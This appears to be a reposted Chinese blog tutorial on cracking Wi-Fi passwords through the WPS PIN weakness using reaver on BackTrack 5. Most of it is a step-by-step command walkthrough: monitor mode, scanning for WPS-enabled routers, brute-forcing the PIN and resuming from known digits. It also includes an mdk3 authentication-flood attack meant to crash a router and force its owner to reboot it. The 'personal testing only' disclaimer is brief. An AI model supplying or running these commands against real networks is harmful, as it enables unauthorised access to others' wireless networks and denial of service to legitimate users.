您的位置:首页 > 其它

精解reaver用BT5成功PIN解码

2013-01-22 20:12 134 查看
转自:黑吧安全网

PIN码破密特点:

1、不需要客户端

2、有PIN码就能获得无线密码

3、八位数PIN码实际只有一万一千组随机密码

4、抓包、EWSA跑包,每个环节都有很大的不确定性,而PIN破密,只要开户WPS,破密只是个时间问题。

提醒:只限于个人测试使用,由于非法操作引起的相关法律责任与本作者无关。

reaver使用方法、步骤:

1、打开超级终端 ROOt shell  

2、如果电脑装有多个无线网卡,请先发指令

3、ifconfig -a

4、确认你用哪一个网卡WLAN0或WLAN1

下面的指令都是以单一网卡WLAN0为例

一、激活监听模式:

airmon-ng start wlan0

 

二、查看周边AP信息(抓包):

airodump-ng  mon0

wash -i mon0 -C

 

观察要破AP的PWR信号强弱变化,注意同频干扰,调整网卡放置位置和角度、方向。

 

PWR 小于 -75 基本上会Timeout, PWR-60左右,则非常顺畅(2-6秒攻击一次)

 

三、按Ctrl+C终止抓包

四、 抓PIN码:

reaver -i mon0 -b MAC  -vv

例如:

reaver -i mon0 -b C8:3A:35:F6:BB:B8 -vv -a -S -d 0 -t 1

 

1.4版可用:

reaver -i mon0 -b C8:3A:35:F6:BB:B8 -v   (可用一个v)

 

注意,MAC中冒号不可省略,MAC地址的字母大小写均可, -vv是两个V不是W!

特别提示:

只有AP开启了WPS、QSS功能,才可以用PIN法破PSK密码!

如何查看AP是否开了WPS、QSS呢?

一、使用指令:

airodump-ng  mon0

MB一栏下,出现  54e. (看清楚有点“.”) 是开WPS的

AP关闭了WPS、或者没有QSS滴,会出现

WARNING: Failed to associate with XX:XX:XX:XX:XX:XX  (ESSID: XXXX)

PIN破密对信号要求极为严格,如果信号稍差,可能导致破密进度变慢或者路由死锁等(重复同一个PIN码 或 timeout),特别是1、6默认频道中,有较多的AP,相互干扰,因此,确定网卡放置的最佳位置、方向、角度十分重要。

破解过程中 ,重复同一个PIN码 或 timeout 可随时随地按Ctrl+C终止,reaver会自动保存进度。

重复第2-4项内容,先看看AP信号强弱或是否关机,若继续破,则再次在终端中发送:

reaver -i mon0 -b MAC -vv

当reaver确定前4位PIN密码后,其工作完成任务进度数值将直接跳跃至90.9%以上,也就是说只剩余一千个密码组合了。总共一万一千个密码。

曙光就在前头,胜利往往在 再坚持一下的努力之中。

如果,90.9%进程后死机或停机,请记下PIN前四位数,用指令:

reaver -i mon0 -b MAC -a -vv -p XXXX(PIN前四位数)

会从指定PIN段起破密。

 

 

额外:(假如pin死了,就用命令强制让路由器重启)

首先检测网卡:

ifconfig -a

然后模拟端口:

airmon-ng start wlan0

接下来用:

airodump-ng mon0   //扫描ap找到你pin死的路由器mac

 

用mdk3 做身份验证攻击

mdk3 mon0 a -a mac(被pin死的路由器的mac)

身份验证攻击效果说明:

此攻击是针对无线AP的洪水攻击,又叫做身份验证攻击。其原理就是向AP发动大量的虚假的链接请求,这种请求数量一旦超 过了无线AP所能承受的范围,AP就会自动断开现有链接,使合法用户无法使用无线网络。迫使路由主人重启路由器。

说明:

此命令功能强大,使用错误会造成所有ap不能使用,请指定mac地址,然后使用,其余命令不要乱试。你要使用此命令的其他参数,请详细阅读此命令参数详解。

 

此操作会让路由器完全宕机,不但无线不能用,有线的也连接不了,必须重启路由器!

请谨慎使用!
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签:  BT5 探测 无线 解密